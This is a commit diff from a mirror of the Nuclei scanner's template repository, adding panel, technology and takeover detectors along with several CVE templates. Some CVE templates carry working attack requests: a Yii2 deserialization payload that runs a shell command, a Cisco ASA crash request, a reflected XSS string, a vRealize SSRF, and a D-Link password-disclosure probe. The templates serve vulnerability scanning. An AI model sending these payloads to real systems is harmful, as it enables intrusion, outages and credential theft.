daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #36 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-04-02 14:09:50 +05:30 committed by GitHub
parent f41960a552 29da918743
commit 1123c6f142
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
45 changed files with 644 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
.nuclei-ignore
View File

@ -13,7 +13,7 @@
.pre-commit-config.yaml
# Fuzzing
# Fuzzing is excluded to avoid running bruteforce on every server as default.
fuzzing/adminer-panel-fuzz.yaml
fuzzing/arbitrary-file-read.yaml
fuzzing/directory-traversal.yaml
@ -23,6 +23,9 @@ fuzzing/iis-shortname.yaml
fuzzing/wp-plugin-scan.yaml
# Miscellaneous
miscellaneous/detect-dns-over-https.yaml
miscellaneous/detect-options-method.yaml
miscellaneous/dir-listing.yaml
miscellaneous/htaccess-config.yaml
miscellaneous/joomla-htaccess.yaml
@ -38,21 +41,28 @@ miscellaneous/robots.txt.yaml
miscellaneous/security.txt.yaml
miscellaneous/trace-method.yaml
miscellaneous/unencrypted-bigip-ltm-cookie.yaml
miscellaneous/unpatched-coldfusion.yaml
miscellaneous/xml-schema-detect.yaml
miscellaneous/detect-dns-over-https.yaml
# IOT
# Headless
headless/dvwa-headless-automatic-login.yaml
headless/postmessage-tracker.yaml
headless/prototype-pollution-check.yaml
headless/window-name-domxss.yaml
# iot
iot/contacam.yaml
iot/epmp-login.yaml
iot/hp-laserjet-detect.yaml
iot/internet-service.yaml
iot/liveview-axis-camera.yaml
iot/mobotix-guest-camera.yaml
iot/network-camera-detect.yaml
iot/nuuno-network-login.yaml
iot/panasonic-network-management.yaml
iot/selea-ip-camera.yaml
# Headless
headless/dvwa-headless-automatic-login.yaml
headless/postmessage-tracker.yaml
headless/prototype-pollution-check.yaml
headless/window-name-domxss.yaml
# CVEs
cves/2017/CVE-2017-17562.yaml

10
README.md
View File

@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 259 | vulnerabilities | 118 | exposed-panels | 113 |
| takeovers | 65 | exposures | 65 | technologies | 52 |
| misconfiguration | 54 | workflows | 25 | miscellaneous | 17 |
| cves | 265 | vulnerabilities | 118 | exposed-panels | 117 |
| takeovers | 67 | exposures | 65 | technologies | 57 |
| misconfiguration | 55 | workflows | 25 | miscellaneous | 19 |
| default-logins | 20 | exposed-tokens | 9 | dns | 8 |
| fuzzing | 7 | helpers | 6 | iot | 8 |
| fuzzing | 7 | helpers | 6 | iot | 10 |
**80 directories, 852 files**.
**80 directories, 874 files**.
</td>
</tr>

100
cves/2017/CVE-2017-17562.yaml Normal file
View File

@ -0,0 +1,100 @@
id: CVE-2017-17562
info:
name: Embedthis GoAhead RCE
description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
author: geeknik
reference:
- https://www.elttam.com/blog/goahead/
- https://github.com/ivanitlearning/CVE-2017-17562
- https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
severity: high
tags: cve,cve2017,rce,embedthis,goahead,fuzz
requests:
- payloads:
endpoint:
- admin
- apply
- non-CA-rev
- cgitest
- checkCookie
- check_user
- chn/liveView
- cht/liveView
- cnswebserver
- config
- configure/set_link_neg
- configure/swports_adjust
- eng/liveView
- firmware
- getCheckCode
- get_status
- getmac
- getparam
- guest/Login
- home
- htmlmgr
- index
- index/login
- jscript
- kvm
- liveView
- login
- login.asp
- login/login
- login/login-page
- login_mgr
- luci
- main
- main-cgi
- manage/login
- menu
- mlogin
- netbinary
- nobody/Captcha
- nobody/VerifyCode
- normal_userLogin
- otgw
- page
- rulectl
- service
- set_new_config
- sl_webviewer
- ssi
- status
- sysconf
- systemutil
- t/out
- top
- unauth
- upload
- variable
- wanstatu
- webcm
- webmain
- webproc
- webscr
- webviewLogin
- webviewLogin_m64
- webviewer
- welcome
raw:
- |
GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: */*
Connection: close
attack: sniper
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "environment variable"
- "display library search paths"
condition: and

52
cves/2018/CVE-2018-0101.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2018-0101
info:
name: Cisco ASA Denial-of-Service # Leads to RCE
author: dwisiswant0
severity: critical
reference: https://www.exploit-db.com/exploits/43986
description: |
A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated,
remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that
the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition.
tags: cve,cve2018,cisco,dos,rce
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST / HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Aggregate-Auth: 1
X-Transcend-Version: 1
Accept-Encoding: identity
X-AnyConnect-Platform: linux-64
X-Support-HTTP-Auth: false
X-Pad: 0000000000000000000000000000000000000000
<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
<host-scan-reply>A</host-scan-reply>
</config-auth>
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- type: dsl
dsl:
- "status_code_2 == 500"
- "status_code_2 == 501"
- "status_code_2 == 502"
- "status_code_2 == 503"
- "status_code_2 == 504"
condition: or

2
cves/2019/CVE-2019-11869.yaml
View File

@ -12,7 +12,7 @@ info:
a payload into the plugin settings, such as the
yuzo_related_post_css_and_style setting.
References:
reference: |
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
- https://wpscan.com/vulnerability/9254
tags: cve,cve2019,wordpress,wp-plugin,xss

1
cves/2019/CVE-2019-14205.yaml
View File

@ -4,6 +4,7 @@ info:
author: pikpikcu
severity: high
tags: cve,cve2019,wordpress,wp-plugin,lfi
description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.
reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205
requests:

3
cves/2019/CVE-2019-17382.yaml
View File

@ -4,7 +4,8 @@ info:
name: Zabbix Authentication Bypass
author: Harsh Bothra
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17382
description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
reference: https://www.exploit-db.com/exploits/47467
tags: cve,cve2019,zabbix
requests:

27
cves/2020/CVE-2020-15148.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2020-15148
info:
name: Yii 2 (yiisoft/yii2) RCE
author: pikpikcu
severity: high
reference: |
- https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
- https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
tags: cve,cve2020,rce,yii
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="
matchers-condition: and
matchers:
- type: word
words:
- "total"
- "internal server error"
condition: and
- type: status
status:
- 500

24
cves/2020/CVE-2020-23517.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2020-23517
info:
name: Aryanic HighMail (High CMS) XSS
author: geeknik
severity: medium
description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
tags: xss,cve,cve2020
requests:
- method: GET
path:
- "{{BaseURL}}/login/?uid=\"><img%20src=\"x\"%20onerror=\"alert(%27XSS%27);\">"
matchers-condition: and
matchers:
- type: word
words:
- text/html
part: header
- type: word
words:
- "<img src=\"x\" onerror=\"alert('XSS')"

32
cves/2020/CVE-2020-25078.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2020-25078
info:
name: D-Link DCS-2530L Administrator password disclosure
author: pikpikcu
severity: high
description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078
tags: cve,cve2020,dlink
requests:
- method: GET
path:
- "{{BaseURL}}/config/getuser?index=0"
matchers-condition: and
matchers:
- type: word
words:
- "name="
- "pass="
condition: and
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200

32
cves/2021/CVE-2021-21975.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2021-21975
info:
name: vRealize Operations Manager API SSRF (VMWare Operations)
author: luci
severity: critical
description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.
tags: cve,cve2021,ssrf,vmware
reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
requests:
- raw:
- |
POST /casa/nodes/thumbprints HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
["127.0.0.1:443/ui/"]
matchers-condition: and
matchers:
- type: word
words:
- 'vRealize Operations Manager'
- 'thumbprint'
- 'address'
condition: and
part: body
- type: status
status:
- 200

17
exposed-panels/joomla-panel.yaml Normal file
View File

@ -0,0 +1,17 @@
id: joomla-panel
info:
name: Joomla Panel
author: github.com/its0x08
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/administrator/"
matchers:
- type: word
words:
- '<meta name="generator" content="Joomla! - Open Source Content Management" />'
- '/administrator/templates/isis/images/joomla.png'
condition: or

24
exposed-panels/wago-plc-panel.yaml Normal file
View File

@ -0,0 +1,24 @@
id: wago-plc-panel
info:
name: WAGO PLC Panel
author: github.com/its0x08
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/plc/webvisu.htm"
matchers-condition: and
matchers:
- type: word
words:
- "<TITLE>CoDeSys WebVisualization</TITLE>"
- "webvisu.jar,minml.jar"
part: body
condition: or
- type: word
words:
- "WAGO_Webs"
part: header

19
exposed-panels/wordpress-login.yaml Normal file
View File

@ -0,0 +1,19 @@
id: wordpress-panel
info:
name: WordPress Panel
author: github.com/its0x08
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/wp-login.php"
matchers:
- type: word
words:
- "WordPress</title>"
- "Log In</title>"
- '/wp-login.php?action=lostpassword">Lost your password?</a>'
- '<form name="loginform" id="loginform" action="{{BaseURL}}/wp-login.php" method="post">'
condition: or

23
exposed-panels/zte-panel.yaml Normal file
View File

@ -0,0 +1,23 @@
id: zte-panel
info:
name: ZTE Panel
author: github.com/its0x08
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "ZTE Corporation. All rights reserved. </div>"
- '<form name="fLogin" id="fLogin" method="post" onsubmit="return false;" action="">'
part: body
condtion: and
- type: word
words:
- "Mini web server 1.0 ZTE corp 2005."
part: header

3
exposures/backups/sql-dump.yaml
View File

@ -18,6 +18,7 @@ requests:
- "{{BaseURL}}/db.sql"
- "{{BaseURL}}/dump.sql"
- "{{BaseURL}}/{{Hostname}}.sql"
- "{{BaseURL}}/{{Hostname}}_db.sql"
- "{{BaseURL}}/localhost.sql"
- "{{BaseURL}}/mysqldump.sql"
- "{{BaseURL}}/mysql.sql"
@ -39,4 +40,4 @@ requests:
status:
- 200
- 206
condition: or
condition: or

2
miscellaneous/detect-dns-over-https.yaml
View File

@ -7,7 +7,7 @@ info:
- https://developers.google.com/speed/public-dns/docs/doh/
- https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat
severity: info
tags: dns,doh
tags: dns,doh,misc
requests:
- method: GET

19
miscellaneous/detect-options-method.yaml Normal file
View File

@ -0,0 +1,19 @@
id: detect-options-method
info:
name: Detect enabled OPTIONS methods
author: pdteam
severity: info
tags: misc
requests:
- method: OPTIONS
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: header
group: 1
regex:
- "Allow: ([A-Z,]+)"

1
miscellaneous/dir-listing.yaml
View File

@ -4,6 +4,7 @@ info:
name: Directory listing enabled
author: _harleo & pentest_swissky
severity: info
tags: misc
requests:
- method: GET

1
miscellaneous/htaccess-config.yaml
View File

@ -4,6 +4,7 @@ info:
name: HTaccess config file
author: Yash Anand @yashanand155
severity: info
tags: misc
requests:
- method: GET

1
miscellaneous/joomla-htaccess.yaml
View File

@ -5,6 +5,7 @@ info:
author: oppsec
severity: info
description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc...
tags: misc
requests:
- method: GET

1
miscellaneous/joomla-manifest-file.yaml
View File

@ -5,6 +5,7 @@ info:
author: oppsec
severity: info
description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths.
tags: misc
requests:
- method: GET

2
miscellaneous/missing-csp.yaml
View File

@ -4,6 +4,8 @@ info:
author: geeknik
severity: info
description: Checks if there is a CSP header
tags: misc
requests:
- method: GET
path:

5
miscellaneous/missing-hsts.yaml
View File

@ -3,8 +3,9 @@ info:
name: Strict Transport Security Not Enforced
author: Dawid Czarnecki
severity: info
description: Checks if the HSTS is enabled by looking for Strict Transport Security
response header.
description: Checks if the HSTS is enabled by looking for Strict Transport Security response header.
tags: misc
requests:
- method: GET
path:

4
miscellaneous/missing-x-frame-options.yaml
View File

@ -4,9 +4,7 @@ info:
name: Clickjacking (Missing XFO header)
author: kurohost
severity: low
# This is an valid issue "only" when you able to frame authenticated page with poc to make state changing actions.
# Without working poc, do not report this.
tags: misc
requests:
- method: GET

1
miscellaneous/moodle-changelog.yaml
View File

@ -5,6 +5,7 @@ info:
author: oppsec
severity: info
description: Moodle have a file which describes API changes in core libraries and APIs, can be used to discover Moodle version.
tags: misc
requests:
- method: GET

1
miscellaneous/ntlm-directories.yaml
View File

@ -4,6 +4,7 @@ info:
name: Discovering directories w/ NTLM
author: puzzlepeaches
severity: info
tags: misc
requests:
- method: GET

1
miscellaneous/old-copyright.yaml
View File

@ -4,6 +4,7 @@ info:
name: Find pages with old copyright dates
author: geeknik
severity: info
tags: misc
requests:
- method: GET

2
miscellaneous/phpmyadmin-setup.yaml
View File

@ -4,7 +4,7 @@ info:
name: Publicly Accessible Phpmyadmin Setup
author: sheikhrishad
severity: medium
tags: misc
requests:
- method: GET

1
miscellaneous/robots.txt.yaml
View File

@ -3,6 +3,7 @@ info:
name: robots.txt file
author: CasperGN
severity: info
tags: misc
requests:
- method: GET

1
miscellaneous/security.txt.yaml
View File

@ -5,6 +5,7 @@ info:
author: bad5ect0r
severity: info
description: The website defines a security policy.
tags: misc
requests:
- method: GET

5
miscellaneous/trace-method.yaml
View File

@ -4,9 +4,8 @@ info:
name: HTTP TRACE method enabled
author: nodauf
severity: info
# References:
# - https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/
tags: misc
reference: https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/
requests:
- method: TRACE

1
miscellaneous/unencrypted-bigip-ltm-cookie.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
reference: https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values
mitigation: https://support.f5.com/csp/article/K23254150
tags: misc
requests:
- method: GET

32
miscellaneous/unpatched-coldfusion.yaml Normal file
View File

@ -0,0 +1,32 @@
id: unpatched-coldfusion
info:
name: Adobe ColdFusion - Improper Input Validation - Arbitrary Code Execution
author: Daviey
severity: info
reference: |
- https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
- https://twitter.com/Daviey/status/1374070630283415558
tags: rce,adobe,misc
requests:
- method: GET
path:
- "{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
matchers-condition: and
matchers:
- type: regex
regex:
- 'eval\(\"\(\"\+json\+\"\)\"\)'
- type: status
status:
- 200

1
miscellaneous/xml-schema-detect.yaml
View File

@ -3,6 +3,7 @@ info:
name: XML Schema Detection
author: alph4byt3
severity: info
tags: misc
requests:
- method: GET

17
misconfiguration/phpMyAdmin-setup.yaml Normal file
View File

@ -0,0 +1,17 @@
id: phpmyadmin-setup
info:
name: phpMyAdmin setup page
author: thevillagehacker
severity: medium
tags: phpmyadmin
reference: https://hackerone.com/reports/297339
requests:
- method: GET
path:
- "{{BaseURL}}/phpmyadmin/setup/index.php"
matchers:
- type: word
words:
- "<title>phpMyAdmin setup</title>"

20
takeovers/freshdesk-takeover.yaml Normal file
View File

@ -0,0 +1,20 @@
id: freshdesk-takeover
info:
name: freshdesk takeover detection
author: Gal Nagli @naglinagli
severity: high
tags: takeover
reference: https://twitter.com/ja1sharma/status/1377239265348743175
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- There is no helpdesk here!
- Maybe this is still fresh!
condition: and

3
takeovers/hatenablog-takeover.yaml
View File

@ -15,5 +15,4 @@ requests:
matchers:
- type: word
words:
- 404 Blog is not found
- Sorry, we can't find the page you're looking for.
- 404 Blog is not found

20
takeovers/medium-takeover.yaml Normal file
View File

@ -0,0 +1,20 @@
id: medium-takeover
info:
name: Medium Takeover Detection
author: rtcms
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/206
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- Oops! We couldnt find that page
- Sorry about that
condition: and

33
technologies/bolt-cms-detect.yaml Normal file
View File

@ -0,0 +1,33 @@
id: bolt-cms-detect
info:
name: bolt CMS detect
author: cyllective
severity: info
description: Detects bolt CMS
tags: tech,bolt,cms
references:
- https://github.com/bolt/bolt
requests:
- method: GET
path:
- "{{BaseURL}}/bolt/login"
matchers:
- type: word
part: body
condition: or
words:
- '<form action="/bolt/login"'
- '<img class="logo" alt="Bolt CMS logo"'
- '<img src="/app/view/img/bolt-logo.png"'
- '<link rel="shortcut icon" href="/app/view/img/favicon-bolt.ico">'
- '<link rel="stylesheet" href="/app/view/css/bolt-old-ie.css"'
- '<link rel="stylesheet" href="/app/view/css/bolt.css"'
- '<script src="/app/view/js/bolt.js"></script>'
- '<script src="/app/view/js/bolt.min.js"'
- '<script src="/assets/bolt.js"></script>'
- 'Bolt requires JavaScript to function properly and continuing without it might corrupt or erase data.'
- 'Bolt » Login'
- 'Cookies are required to log on to Bolt. Please allow cookies.'

30
technologies/moinmoin-detect.yaml Normal file
View File

@ -0,0 +1,30 @@
id: moinmoin-detect
info:
name: MoinMoin wiki detect
author: cyllective
severity: info
description: Detects MoinMoin Wiki
tags: tech,moin,moinmoin,wiki
references:
- https://github.com/moinwiki/moin-1.9
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: body
condition: or
words:
- '<a href="http://moinmo.in/" title="This site uses the MoinMoin Wiki software.">MoinMoin Powered</a>'
- '<a href="http://moinmo.in/Python" title="MoinMoin is written in Python.">Python Powered</a>'
extractors:
- type: regex
part: body
group: 1
regex:
- '\/moin_static(\w+)\/'

21
technologies/opencast-detect.yaml Normal file
View File

@ -0,0 +1,21 @@
id: opencast-detect
info:
name: Opencast detect
author: cyllective
severity: info
description: Detects Opencast
tags: tech,opencast
references:
- https://github.com/opencast/opencast
requests:
- method: GET
path:
- "{{BaseURL}}/admin-ng/login.html"
matchers:
- type: word
part: body
words:
- '<title>Opencast</title>'

27
technologies/shopware-detect.yaml Normal file
View File

@ -0,0 +1,27 @@
id: shopware-detect
info:
name: Shopware CMS detect
author: cyllective
severity: info
description: Detects Shopware CMS
tags: tech,shopware,cms
references:
- https://github.com/shopware/shopware
- https://github.com/shopware/platform
requests:
- method: GET
path:
- "{{BaseURL}}/admin"
- "{{BaseURL}}/backend"
matchers:
- type: word
part: body
condition: or
words:
- 'Realisiert mit Shopware'
- 'Realised with Shopware'
- 'Shopware Administration (c) shopware AG'
- '<title>Shopware 5 - Backend (c) shopware AG</title>'

22
technologies/strapi-cms-detect.yaml Normal file
View File

@ -0,0 +1,22 @@
id: strapi-cms-detect
info:
name: strapi CMS detect
author: cyllective
severity: info
description: Detects strapi CMS
tags: tech,strapi,cms
references:
- https://github.com/strapi/strapi
requests:
- method: GET
path:
- "{{BaseURL}}/admin/auth/login"
matchers:
- type: word
part: body
condition: or
words:
- '<title>Strapi Admin</title>'

3
workflows/cisco-asa-workflow.yaml
View File

@ -16,4 +16,5 @@ workflows:
subtemplates:
- template: cves/2020/CVE-2020-3187.yaml
- template: cves/2020/CVE-2020-3452.yaml
- template: cves/2018/CVE-2018-0296.yaml
- template: cves/2018/CVE-2018-0296.yaml
- template: cves/2018/CVE-2018-0101.yaml